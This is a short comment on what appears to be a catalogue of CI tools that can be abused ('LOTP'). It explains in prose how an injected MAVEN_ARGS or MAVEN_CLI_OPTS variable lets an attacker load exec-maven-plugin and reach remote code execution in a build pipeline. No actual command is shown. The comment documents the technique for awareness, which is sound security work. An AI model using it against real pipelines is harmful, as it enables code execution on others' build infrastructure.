tr4l
commented
5 months ago Note: https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml
You can achieve the same on GITLAB with old version of maven by using MAVEN_CLI_OPTS env
Description of the LOTP tool
MAVEN, you got it already.
ENV Configuration
Since version 3.9, MAVEN support MAVEN_ARGS env variable as parameter. In addition to that, you can run (and download) any (approved) plugin without editing the pom.xml
For instance
Which mean you can escalate an env injection to plugin injection, then RCE (let see with exec-maven-plugin, as in your example)
Documentation
https://maven.apache.org/configure.html#maven_opts-environment-variable https://github.com/tr4l/maven-password https://www.mojohaus.org/exec-maven-plugin/exec-mojo.html